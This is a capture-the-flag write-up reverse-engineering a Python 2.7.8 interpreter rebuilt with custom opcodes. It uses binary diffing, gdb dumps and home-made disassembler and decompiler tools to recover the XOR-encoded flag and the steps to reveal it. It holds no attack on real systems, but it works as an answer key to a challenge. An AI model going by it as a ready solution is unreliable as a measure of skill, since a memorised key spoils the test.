Finding the interesting bits

The next step is to figure out what part of the binary is interesting, what functions have been modified, and where we find the problem we need to solve to get the flag. My idea for that was to use a binary-diffing tool between an original Python278 interpreter and the one we were given.

To do so I just grabbed Python278's sources and compiled them myself:

overclok@wildout:~/chall/ql-py$ wget https://www.python.org/ftp/python/2.7.8/Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ tar xzvf Python-2.7.8.tgz

overclok@wildout:~/chall/ql-py$ cd Python-2.7.8/ && ./configure && make

overclok@wildout:~/chall/ql-py/Python-2.7.8$ ls -lah ./python
-rwxrwxr-x 1 overclok overclok 8.0M Sep  5 00:13 ./python

The resulting binary has a similar size, so it should do the job even if I'm not using GCC 4.8.2 and the same compilation/optimization options. To perform the diffing I used IDA Pro and Patchdiff v2.0.10.

---------------------------------------------------
PatchDiff Plugin v2.0.10
Copyright (c) 2010-2011, Nicolas Pouvesle
Copyright (C) 2007-2009, Tenable Network Security, Inc
---------------------------------------------------

Scanning for functions ...
parsing second idb...
parsing first idb...
diffing...
Identical functions:   2750
Matched functions:     176
Unmatched functions 1: 23
Unmatched functions 2: 85
done!

Once the tool has finished its analysis we just have to check the list of unmatched function names (around one hundred of them, so it's pretty quick), and eventually we see that:

[Image: initdo_not_run_me.png]

That function directly caught my eye (you can even check that it doesn't exist in the Python278 source tree, obviously :-)), and it appears this function is just setting up a Python module called do_not_run_me.

[Image: initdonotrunme_assembly.png]

Let's import it:

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import do_not_run_me
>>> print do_not_run_me.__doc__
None
>>> dir(do_not_run_me)
['__doc__', '__name__', '__package__', 'run_me']
>>> print do_not_run_me.run_me.__doc__
There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ``There are two kinds of people in the world: those who say there is no such thing as infinite recursion, and those who say ...
>>> do_not_run_me.run_me('doar-e')
Segmentation fault

All right, we now have something to look at and we are going to do so from a low level point of view because that's what I like ; so don't expect big/magic hacks here :).

If you are not really familiar with Python's VM structures I would advise you to read quickly through this article Deep Dive Into Python’s VM: Story of LOAD_CONST Bug, and you should be all set for the next parts.

do_not_run_me.run_me

The function is quite small, so it should be pretty quick to analyze:

  1. the first part makes sure that we pass a string as an argument when calling run_me,
  2. then a custom marshaled function is loaded, a function is created out of it, and called,
  3. after that it creates another function from the string we pass to the function (which explains the segfault just above),
  4. finally, a last function is created from another hardcoded marshaled string.

First marshaled function

To understand it we have to dump it first, to unmarshal it and to analyze the resulting code object:

overclok@wildout:~/chall/ql-py$ gdb -q /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Reading symbols from /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf...done.
gdb$ set disassembly-flavor intel
gdb$ disass run_me
Dump of assembler code for function run_me:
    0x0000000000513d90 <+0>:     push   rbp
    0x0000000000513d91 <+1>:     mov    rdi,rsi
    0x0000000000513d94 <+4>:     xor    eax,eax
    0x0000000000513d96 <+6>:     mov    esi,0x56c70b
    0x0000000000513d9b <+11>:    push   rbx
    0x0000000000513d9c <+12>:    sub    rsp,0x28
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp

    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

    ; Creates a code object from the marshaled string
    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
    0x0000000000513dd0 <+64>:    call   0x4dc020 <PyMarshal_ReadObjectFromString> 
    0x0000000000513dd5 <+69>:    mov    rdi,rax
    0x0000000000513dd8 <+72>:    mov    rsi,rbx

    ; Creates a function object from the code object returned above
    0x0000000000513ddb <+75>:    call   0x52c630 <PyFunction_New>
    0x0000000000513de0 <+80>:    xor    edi,edi
[...]
gdb$ r -c 'import do_not_run_me as v; v.run_me("")'
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf -c 'import do_not_run_me as v; v.run_me("")'
[...]

To start, we can set two software breakpoints @0x0000000000513dd0 and @0x0000000000513dd5 to inspect both the marshaled string and the resulting code object.

Just a little reminder though on the Linux/x64 ABI: "The first six integer or pointer arguments are passed in registers RDI, RSI, RDX, RCX, R8, and R9".

gdb$ p /x $rsi
$2 = 0x91

gdb$ x/145bx $rdi
0x56c940 <+00>:  0x63    0x00    0x00    0x00    0x00    0x01    0x00    0x00
0x56c948 <+08>:  0x00    0x02    0x00    0x00    0x00    0x43    0x00    0x00
0x56c950 <+16>:  0x00    0x73    0x14    0x00    0x00    0x00    0x64    0x01
0x56c958 <+24>:  0x00    0x87    0x00    0x00    0x7c    0x00    0x00    0x64
0x56c960 <+32>:  0x01    0x00    0x3c    0x61    0x00    0x00    0x7c    0x00
0x56c968 <+40>:  0x00    0x1b    0x28    0x02    0x00    0x00    0x00    0x4e
0x56c970 <+48>:  0x69    0x01    0x00    0x00    0x00    0x28    0x01    0x00
0x56c978 <+56>:  0x00    0x00    0x74    0x04    0x00    0x00    0x00    0x54
0x56c980 <+64>:  0x72    0x75    0x65    0x28    0x01    0x00    0x00    0x00
0x56c988 <+72>:  0x74    0x0e    0x00    0x00    0x00    0x52    0x6f    0x62
0x56c990 <+80>:  0x65    0x72    0x74    0x5f    0x46    0x6f    0x72    0x73
0x56c998 <+88>:  0x79    0x74    0x68    0x28    0x00    0x00    0x00    0x00
0x56c9a0 <+96>:  0x28    0x00    0x00    0x00    0x00    0x73    0x10    0x00
0x56c9a8 <+104>: 0x00    0x00    0x6f    0x62    0x66    0x75    0x73    0x63
0x56c9b0 <+112>: 0x61    0x74    0x65    0x2f    0x67    0x65    0x6e    0x2e
0x56c9b8 <+120>: 0x70    0x79    0x74    0x03    0x00    0x00    0x00    0x66
0x56c9c0 <+128>: 0x6f    0x6f    0x05    0x00    0x00    0x00    0x73    0x06
0x56c9c8 <+136>: 0x00    0x00    0x00    0x00    0x01    0x06    0x02    0x0a
0x56c9d0 <+144>: 0x01

And obviously you can't use the Python marshal module to load & inspect the resulting object as the author seems to have removed the methods loads and dumps:

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import marshal
>>> dir(marshal)
['__doc__', '__name__', '__package__', 'version']

We could still try to load the marshaled string in our freshly compiled original Python though:

>>> import marshal
>>> part_1 = marshal.loads('c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x14\x00\x00\x00d\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b(\x02\x00\x00\x00Ni\x01\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00True(\x01\x00\x00\x00t\x0e\x00\x00\x00Robert_Forsyth(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00obfuscate/gen.pyt\x03\x00\x00\x00foo\x05\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x02\n\x01')
>>> part_1.co_code
'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b'
>>> part_1.co_varnames
('Robert_Forsyth',)
>>> part_1.co_names
('True',)
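
The first fields of the blob can also be decoded by hand, without any interpreter. The sketch below assumes the Python 2.7 marshal layout for code objects (a 'c' tag, four little-endian 32-bit integers for argcount, nlocals, stacksize and flags, then co_code as an 's' string with a 32-bit length). BLOB_PREFIX is copied from the first 42 bytes of the hex dump above, parse_code_header is a made-up helper name, and the sketch is written for Python 3.

```python
import struct

# First 42 bytes of the marshaled string at 0x56c940, taken from the hex dump.
BLOB_PREFIX = bytes.fromhex(
    "63"                                    # 'c': code object tag
    "00000000" "01000000" "02000000" "43000000"
    "73" "14000000"                         # 's' + length of co_code (0x14)
    "640100" "870000" "7c0000" "640100" "3c" "610000" "7c0000" "1b"
)


def parse_code_header(blob):
    """Hypothetical helper: decode the leading fields of a marshaled code object."""
    if blob[0:1] != b"c":
        raise ValueError("not a marshaled code object")
    argcount, nlocals, stacksize, flags = struct.unpack_from("<4i", blob, 1)
    if blob[17:18] != b"s":
        raise ValueError("expected a string tag for co_code")
    (size,) = struct.unpack_from("<i", blob, 18)
    return {
        "co_argcount": argcount,
        "co_nlocals": nlocals,
        "co_stacksize": stacksize,
        "co_flags": flags,
        "co_code": blob[22:22 + size],
    }


if __name__ == "__main__":
    print(parse_code_header(BLOB_PREFIX))
```

Only the container format is standard here; the bytes inside co_code still use the custom opcode numbering.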

We can also go further by trying to create a function out of this code object, call it and/or even disassemble it:

>>> from types import FunctionType
>>> def a():
...     pass
...
>>> f = FunctionType(part_1, a.func_globals)
>>> f()
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "obfuscate/gen.py", line 8, in foo
UnboundLocalError: local variable 'Robert_Forsyth' referenced before assignment
>>> import dis
>>> dis.dis(f)
    6           0 LOAD_CONST               1 (1)
                3 LOAD_CLOSURE             0
Traceback (most recent call last):
    File "<stdin>", line 1, in <module>
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 43, in dis
    disassemble(x)
    File "/home/overclok/chall/ql-py/Python-2.7.8/Lib/dis.py", line 107, in disassemble
    print '(' + free[oparg] + ')',
IndexError: tuple index out of range

Introducing dpy.py

All right, as expected this does not work at all: seems like the custom interpreter uses different opcodes which the original virtual CPU doesn't know about. Anyway, let's have a look at this object directly from memory because we like low level things (remember?):

gdb$ p *(PyObject*)$rax
$3 = {ob_refcnt = 0x1, ob_type = 0x7d3da0 <PyCode_Type>}

; OK, it is a code object; let's dump the entire object now
gdb$ p *(PyCodeObject*)$rax
$4 = {
    ob_refcnt = 0x1,
    ob_type = 0x7d3da0 <PyCode_Type>,
    co_argcount = 0x0, co_nlocals = 0x1, co_stacksize = 0x2, co_flags = 0x43,
    co_code = 0x7ffff7f09df0,
    co_consts = 0x7ffff7ee2908,
    co_names = 0x7ffff7f8e390,
    co_varnames = 0x7ffff7f09ed0,
    co_freevars = 0x7ffff7fa7050, co_cellvars = 0x7ffff7fa7050,
    co_filename = 0x7ffff70a9b58,
    co_name = 0x7ffff7f102b0,
    co_firstlineno = 0x5,
    co_lnotab = 0x7ffff7e59900,
    co_zombieframe = 0x0,
    co_weakreflist = 0x0
}

Perfect, and you can do that for every single field of this structure:

  • to dump the bytecode,
  • the constants used,
  • the variable names,
  • etc.

Yes, this is annoying, very much so. That is exactly why there is dpy, a GDB Python command I wrote to dump Python objects in a much easier way directly from memory:

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[...]
>>> a = { 1 : [1,2,3], 'two' : 31337, 3 : (1,'lul', [3,4,5])}
>>> print hex(id(a))
0x7ffff7ef1050
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7ef1050
dict -> {1: [1, 2, 3], 3: (1, 'lul', [3, 4, 5]), 'two': 31337}

I need a disassembler now dad

But let's get back to our second breakpoint now, and see what dpy gives us with the resulting code object:

gdb$ dpy $rax
code -> {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b',
    'co_consts': (None, 1),
    'co_name': 'foo',
    'co_names': ('True',),
    'co_varnames': ('Robert_Forsyth',)}

Because we know the bytecode used by this interpreter is different from the original one, we have to figure out the mapping between the instructions and their opcodes:

  1. Either we reverse-engineer each handler of the virtual CPU,
  2. Or we create the same functions in both interpreters, dump their bytecode (thanks to dpy) and match the equivalent opcodes

I guess we can mix both of them to be more efficient:

Python 2.7.8 (default, Sep  5 2014, 00:13:07)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> import dis
>>> dis.dis(assi)
    2           0 LOAD_CONST               1 ('hu')
                3 STORE_FAST               0 (x)
                6 LOAD_CONST               0 (None)
                9 RETURN_VALUE
>>> dis.dis(add)
    2           0 LOAD_FAST                0 (x)
                3 LOAD_CONST               1 (31337)
                6 BINARY_ADD
                7 RETURN_VALUE
>>> assi.func_code.co_code
'd\x01\x00}\x00\x00d\x00\x00S'
>>> add.func_code.co_code
'|\x00\x00d\x01\x00\x17S'

# In the custom interpreter

gdb$ r
Starting program: /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> def assi(x):
...     x = 'hu'
...
>>> def add(x):
...     return x + 31337
...
>>> print hex(id(assi))
0x7ffff7f0c578
>>> print hex(id(add))
0x7ffff7f0c5f0
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0c578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 'hu'),
                'co_name': 'assi',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'assi'}
gdb$ dpy 0x7ffff7f0c5f0
function -> {'func_code': {'co_code': '\x8f\x00\x00d\x01\x00=\x1b',
                'co_consts': (None, 31337),
                'co_name': 'add',
                'co_names': (),
                'co_varnames': ('x',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'add'}

    # From here we have:
    # 0x64 -> LOAD_CONST
    # 0x87 -> STORE_FAST
    # 0x1b -> RETURN_VALUE
    # 0x8f -> LOAD_FAST
    # 0x3d -> BINARY_ADD
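
The matching step can be automated. The sketch below walks the stock and custom bytecode of the same function in lockstep and records which custom byte sits where a known stock opcode is. It assumes both interpreters encode instructions with the same lengths (one byte, plus a two-byte argument for stock opcodes >= 90), which holds for the two functions dumped above. PY27_NAMES only lists the five stock opcodes needed here, match_opcodes is a made-up helper name, and the code targets Python 3.

```python
# Stock Python 2.7 opcode numbers for the instructions used by assi and add.
PY27_NAMES = {
    0x17: "BINARY_ADD",
    0x53: "RETURN_VALUE",
    0x64: "LOAD_CONST",
    0x7c: "LOAD_FAST",
    0x7d: "STORE_FAST",
}
HAVE_ARGUMENT = 90  # stock opcodes >= 90 carry a 16-bit argument


def match_opcodes(stock_code, custom_code):
    """Hypothetical helper: map custom opcode bytes to stock mnemonics."""
    if len(stock_code) != len(custom_code):
        raise ValueError("bytecode strings must have the same length")
    mapping = {}
    offset = 0
    while offset < len(stock_code):
        mapping[custom_code[offset]] = PY27_NAMES[stock_code[offset]]
        # Instruction lengths are driven by the stock opcode.
        offset += 3 if stock_code[offset] >= HAVE_ARGUMENT else 1
    return mapping


if __name__ == "__main__":
    mapping = {}
    # assi: stock co_code vs. co_code dumped from the custom interpreter
    mapping.update(match_opcodes(b'd\x01\x00}\x00\x00d\x00\x00S',
                                 b'd\x01\x00\x87\x00\x00d\x00\x00\x1b'))
    # add: same comparison
    mapping.update(match_opcodes(b'|\x00\x00d\x01\x00\x17S',
                                 b'\x8f\x00\x00d\x01\x00=\x1b'))
    for opcode in sorted(mapping):
        print(hex(opcode), '->', mapping[opcode])
```

Each extra pair of functions exercising new instructions extends the mapping in the same way.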

OK I think you got the idea, and if you don't manage to find all of them you can just debug the virtual CPU by putting a software breakpoint @0x4b0960:

=> 0x4b0923 <PyEval_EvalFrameEx+867>:   movzx  eax,BYTE PTR [r13+0x0]

For the interested readers: there is at least one interesting opcode that you wouldn't find in a normal Python interpreter, check what 0xA0 is doing especially when followed by 0x87 :-).

Back to the first marshaled function with all our tooling now

Thanks to our disassembler.py, we can now easily disassemble the first part:

PS D:\Codes\ql-chall-python-2014> python .\disassembler_ql_chall.py
    6           0 LOAD_CONST               1 (1)
                3 STORE_FAST               0 (Robert_Forsyth)

    8           6 LOAD_GLOBAL              0 (True)
                9 LOAD_CONST               1 (1)
                12 INPLACE_ADD
                13 STORE_GLOBAL             0 (True)

    9          16 LOAD_GLOBAL              0 (True)
                19 RETURN_VALUE
================================================================================
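
To give an idea of what such a disassembler involves, here is a minimal sketch; it is not the disassembler.py used above. The opcode table only contains the eight values that can be read off this post: five from the assi/add comparison, and 0x7c, 0x3c and 0x61, inferred by lining up the co_code bytes of the first function with the listing just above. CUSTOM_OPCODES and disassemble are made-up names, and the code targets Python 3.

```python
# custom opcode -> (mnemonic, takes a 16-bit little-endian argument)
CUSTOM_OPCODES = {
    0x1b: ("RETURN_VALUE", False),
    0x3c: ("INPLACE_ADD", False),
    0x3d: ("BINARY_ADD", False),
    0x61: ("STORE_GLOBAL", True),
    0x64: ("LOAD_CONST", True),
    0x7c: ("LOAD_GLOBAL", True),
    0x87: ("STORE_FAST", True),
    0x8f: ("LOAD_FAST", True),
}


def disassemble(co_code):
    """Hypothetical helper: return a list of (offset, mnemonic, argument)."""
    listing = []
    offset = 0
    while offset < len(co_code):
        name, has_arg = CUSTOM_OPCODES[co_code[offset]]
        if has_arg:
            arg = co_code[offset + 1] | (co_code[offset + 2] << 8)
            listing.append((offset, name, arg))
            offset += 3
        else:
            listing.append((offset, name, None))
            offset += 1
    return listing


if __name__ == "__main__":
    part_1 = b'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00|\x00\x00\x1b'
    for offset, name, arg in disassemble(part_1):
        print('%4d %-14s %s' % (offset, name, '' if arg is None else arg))
```

An unknown byte raises a KeyError, which is a convenient signal that another opcode still has to be identified.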

It seems the author has been really (too) kind to us: the function is really small and we can rewrite it in Python straightaway:

def part1():
    global True
    Robert_Forsyth = 1
    True += 1

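You can also make sure with dpy that the code of our rewritten function is the same as the unmarshaled function we dumped earlier (only the tail differs: our version implicitly returns None, while the original returns True).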

>>> def part_1():
...  global True
...  Robert_Forsyth = 1
...  True += 1
...
>>> print hex(id(part_1))
0x7ffff7f0f578
>>> ^C
Program received signal SIGINT, Interrupt.
gdb$ dpy 0x7ffff7f0f578
function -> {'func_code': {'co_code': 'd\x01\x00\x87\x00\x00|\x00\x00d\x01\x00<a\x00\x00d\x00\x00\x1b',
                'co_consts': (None, 1),
                'co_name': 'part_1',
                'co_names': ('True',),
                'co_varnames': ('Robert_Forsyth',)},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'part_1'}

Run my bytecode

The second part is also quite simple according to the following disassembly:

gdb$ disass run_me
Dump of assembler code for function run_me:
[...]
    ; Parses the arguments we gave, it expects a string object
    0x0000000000513da0 <+16>:    lea    rcx,[rsp+0x10]
    0x0000000000513da5 <+21>:    mov    rdx,rsp
    0x0000000000513da8 <+24>:    call   0x4cf430 <PyArg_ParseTuple>
    0x0000000000513dad <+29>:    xor    edx,edx
    0x0000000000513daf <+31>:    test   eax,eax
    0x0000000000513db1 <+33>:    je     0x513e5e <run_me+206>

    0x0000000000513db7 <+39>:    mov    rax,QWORD PTR [rip+0x2d4342]
    0x0000000000513dbe <+46>:    mov    esi,0x91
    0x0000000000513dc3 <+51>:    mov    edi,0x56c940
    0x0000000000513dc8 <+56>:    mov    rax,QWORD PTR [rax+0x10]
    0x0000000000513dcc <+60>:    mov    rbx,QWORD PTR [rax+0x30]

[...]
    ; Part1
[...]

    0x0000000000513df7 <+103>:   mov    rsi,QWORD PTR [rsp+0x10]
    0x0000000000513dfc <+108>:   mov    rdi,QWORD PTR [rsp]
    ; Uses the string passed as argument to run_me as a marshaled object
    ; PyObject* PyMarshal_ReadObjectFromString(char *string, Py_ssize_t len)
    0x0000000000513e00 <+112>:   call   0x4dc020 <PyMarshal_ReadObjectFromString>

    0x0000000000513e05 <+117>:   mov    rsi,rbx
    0x0000000000513e08 <+120>:   mov    rdi,rax

    ; Creates a function out of it
    0x0000000000513e0b <+123>:   call   0x52c630 <PyFunction_New>
    0x0000000000513e10 <+128>:   xor    edi,edi
    0x0000000000513e12 <+130>:   mov    rbp,rax
    0x0000000000513e15 <+133>:   call   0x478f80 <PyTuple_New>

    ; Calls it
    ; PyObject* PyObject_Call(PyObject *callable_object, PyObject *args, PyObject *kw)
    0x0000000000513e1a <+138>:   xor    edx,edx
    0x0000000000513e1c <+140>:   mov    rdi,rbp
    0x0000000000513e1f <+143>:   mov    rsi,rax
    0x0000000000513e22 <+146>:   call   0x422b40 <PyObject_Call>

Basically, the string you pass to run_me is treated as a marshaled function: it explains why you get segmentation faults when you call the function with random strings. We can just jump over that part of the function because we don't really need it so far: set $rip=0x513e27 and job done!

Second & last marshaled function

By the way I hope you are still reading -- hold tight, we are nearly done! Let's dump the function object with dpy:

-----------------------------------------------------------------------------------------------------------------------[regs]
    RAX: 0x00007FFFF7FA7050  RBX: 0x00007FFFF7F0F758  RBP: 0x00000000007B0270  RSP: 0x00007FFFFFFFE040  o d I t s Z a P c
    RDI: 0x00007FFFF7F0F758  RSI: 0x00007FFFF7FA7050  RDX: 0x0000000000000000  RCX: 0x0000000000000828  RIP: 0x0000000000513E56
    R8 : 0x0000000000880728  R9 : 0x00007FFFF7F8D908  R10: 0x00007FFFF7FA7050  R11: 0x00007FFFF7FA7050  R12: 0x00007FFFF7FD0F48
    R13: 0x00000000007EF0A0  R14: 0x00007FFFF7F3CB00  R15: 0x00007FFFF7F07ED0
    CS: 0033  DS: 0000  ES: 0000  FS: 0000  GS: 0000  SS: 002B
-----------------------------------------------------------------------------------------------------------------------[code]
=> 0x513e56 <run_me+198>:       call   0x422b40 <PyObject_Call>
-----------------------------------------------------------------------------------------------------------------------------
gdb$ dpy $rdi
function -> {'func_code': {'co_code': '\\x7c\\x00\\x00\\x64\\x01\\x00\\x6b\\x03\\x00\\x72\\x19\\x00\\x7c\\x00\\x00\\x64\\x02\\x00\\x55\\x61\\x00\\x00\\x6e\\x6e\\x00\\x7c\\x01\\x00\\x6a\\x02\\x00\\x64\\x03\\x00\\x6a\\x03\\x00\\x64\\x04\\x00\\x77\\x00\\x00\\xa0\\x05\\x00\\xc8\\x06\\x00\\xa0\\x07\\x00\\xb2\\x08\\x00\\xa0\\x09\\x00\\xea\\x0a\\x00\\xa0\\x0b\\x00\\x91\\x08\\x00\\xa0\\x0c\\x00\\x9e\\x0b\\x00\\xa0\\x0d\\x00\\xd4\\x08\\x00\\xa0\\x0e\\x00\\xd5\\x0f\\x00\\xa0\\x10\\x00\\xdd\\x11\\x00\\xa0\\x07\\x00\\xcc\\x08\\x00\\xa0\\x12\\x00\\x78\\x0b\\x00\\xa0\\x13\\x00\\x87\\x0f\\x00\\xa0\\x14\\x00\\x5b\\x15\\x00\\xa0\\x16\\x00\\x97\\x17\\x00\\x67\\x1a\\x00\\x53\\x86\\x01\\x00\\x86\\x01\\x00\\x86\\x01\\x00\\x54\\x64\\x00\\x00\\x1b',
    'co_consts': (None,
        3,
        1,
        '',
        {'co_code': '\\x8f\\x00\\x00\\x5d\\x15\\x00\\x87\\x01\\x00\\x7c\\x00\\x00\\x8f\\x01\\x00\\x64\\x00\\x00\\x4e\\x86\\x01\\x00\\x59\\x54\\x71\\x03\\x00\\x64\\x01\\x00\\x1b',
        'co_consts': (13, None),
        'co_name': '<genexpr>',
        'co_names': ('chr',),
        'co_varnames': ('.0', '_')},
        75,
        98,
        127,
        45,
        89,
        101,
        104,
        67,
        122,
        65,
        120,
        99,
        108,
        95,
        125,
        111,
        97,
        100,
        110),
    'co_name': 'foo',
    'co_names': ('True', 'quarkslab', 'append', 'join'),
    'co_varnames': ()},
    'func_dict': None,
    'func_doc': None,
    'func_module': '__main__',
    'func_name': 'foo'}

Even before studying / disassembling the code, we see some interesting things: chr, quarkslab, append, join, etc. It definitely feels like that function is generating the flag we are looking for.

Seeing append, join and another code object (in co_consts) suggests that a generator is used to populate the variable quarkslab. We can also guess that the bunch of bytes we are seeing may be the encoded/encrypted flag. In my opinion, we can infer too much information just by dumping and looking at the object.

Let's use our magic disassembler.py to see those code objects:

    19     >>    0 LOAD_GLOBAL              0 (True)
                3 LOAD_CONST               1 (3)
                6 COMPARE_OP               3 (!=)
                9 POP_JUMP_IF_FALSE       25

    20          12 LOAD_GLOBAL              0 (True)
                15 LOAD_CONST               2 (1)
                18 INPLACE_SUBTRACT
                19 STORE_GLOBAL             0 (True)
                22 JUMP_FORWARD           110 (to 135)

    22     >>   25 LOAD_GLOBAL              1 (quarkslab)
                28 LOAD_ATTR                2 (append)
                31 LOAD_CONST               3 ('')
                34 LOAD_ATTR                3 (join)
                37 LOAD_CONST               4 (<code object <genexpr> at 023A84A0, file "obfuscate/gen.py", line 22>)
                40 MAKE_FUNCTION            0
                43 LOAD_CONST2              5 (75)
                46 LOAD_CONST3              6 (98)
                49 LOAD_CONST2              7 (127)
                52 LOAD_CONST5              8 (45)
                55 LOAD_CONST2              9 (89)
                58 LOAD_CONST4             10 (101)
                61 LOAD_CONST2             11 (104)
                64 LOAD_CONST6              8 (45)
                67 LOAD_CONST2             12 (67)
                70 LOAD_CONST7             11 (104)
                73 LOAD_CONST2             13 (122)
                76 LOAD_CONST8              8 (45)
                79 LOAD_CONST2             14 (65)
                82 LOAD_CONST10            15 (120)
                85 LOAD_CONST2             16 (99)
                88 LOAD_CONST9             17 (108)
                91 LOAD_CONST2              7 (127)
                94 LOAD_CONST11             8 (45)
                97 LOAD_CONST2             18 (95)
            100 LOAD_CONST12            11 (104)
            103 LOAD_CONST2             19 (125)
            106 LOAD_CONST16            15 (120)
            109 LOAD_CONST2             20 (111)
            112 LOAD_CONST14            21 (97)
            115 LOAD_CONST2             22 (100)
            118 LOAD_CONST15            23 (110)
            121 BUILD_LIST              26
            124 GET_ITER
            125 CALL_FUNCTION            1
            128 CALL_FUNCTION            1
            131 CALL_FUNCTION            1
            134 POP_TOP
        >>  135 LOAD_CONST               0 (None)
            138 RETURN_VALUE
================================================================================
    22           0 LOAD_FAST                0 (.0)
        >>    3 FOR_ITER                21 (to 27)
                6 LOAD_CONST16             1 (None)
                9 LOAD_GLOBAL              0 (chr)
                12 LOAD_FAST                1 (_)
                15 LOAD_CONST               0 (13)
                18 BINARY_XOR
                19 CALL_FUNCTION            1
                22 YIELD_VALUE
                23 POP_TOP
                24 JUMP_ABSOLUTE            3
        >>   27 LOAD_CONST               1 (None)
                30 RETURN_VALUE

Great, that definitely sounds like what we described earlier.

I need a decompiler dad

Now because we really like to hack things, I decided to patch a Python decompiler to support the opcodes defined in this challenge in order to fully decompile the codes we saw so far.

I won't bother you with how I managed to do it though ; long story short: it is built on top of fupy.py which is a readable hackable Python 2.7 decompiler written by the awesome Guillaume Delugre -- Cheers to my mate @Myst3rie for telling me about this project!

So here is decompiler.py working on the two code objects of the challenge:

PS D:\Codes\ql-chall-python-2014> python .\decompiler_ql_chall.py
PART1 ====================
Robert_Forsyth = 1
True = True + 1

PART2 ====================
if True != 3:
    True = True - 1
else:
    quarkslab.append(''.join(chr(_ ^ 13) for _ in [75, 98, 127, 45, 89, 101, 104, 45, 67, 104, 122, 45, 65, 120, 99, 108, 127, 45, 95, 104, 125, 120, 111, 97, 100, 110]))
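
The interplay between the two parts can be replayed in a stock interpreter. In the sketch below the global True is modelled as an entry in a plain dictionary, since Python 3 (used for this illustration) does not allow rebinding True; part1, part2 and run are made-up names that mirror the decompiled output above.

```python
ENCODED = [75, 98, 127, 45, 89, 101, 104, 45, 67, 104, 122, 45, 65, 120,
           99, 108, 127, 45, 95, 104, 125, 120, 111, 97, 100, 110]


def part1(state):
    # Robert_Forsyth = 1 is a dead local; only the increment matters.
    state['True'] += 1


def part2(state):
    if state['True'] != 3:
        state['True'] -= 1
    else:
        decoded = ''.join(chr(value ^ 13) for value in ENCODED)
        state['quarkslab'].append(decoded)


def run(initial_true):
    """Hypothetical helper: run both parts from a given starting value of True."""
    state = {'True': initial_true, 'quarkslab': []}
    part1(state)
    part2(state)
    return state


if __name__ == '__main__':
    print(run(1))  # default value of True: nothing gets appended
    print(run(2))  # True starts at 2: the else branch is taken
```

With the default value of True (1), the first part bumps it to 2, the comparison with 3 fails and the second part simply restores it, which is why the starting value matters.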

Brilliant -- time to get a flag now :-). Here are the things we need to do:

  1. Set True to 2 (so that it's equal to 3 in the part 2)
  2. Declare a list named quarkslab
  3. Jump over the middle part of the function where it will run the bytecode you gave as argument (or give a valid marshaled string that won't crash the interpreter)
  4. Profit!

overclok@wildout:~/chall/ql-py$ /usr/bin/b7d8438de09fffb12e3950e7ad4970a4a998403bdf3763dd4178adf
Python 2.7.8+ (nvcs/newopcodes:a9bd62e4d5f2+, Sep  1 2014, 11:41:46)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> True = 2
>>> quarkslab = list()
>>> import do_not_run_me as v
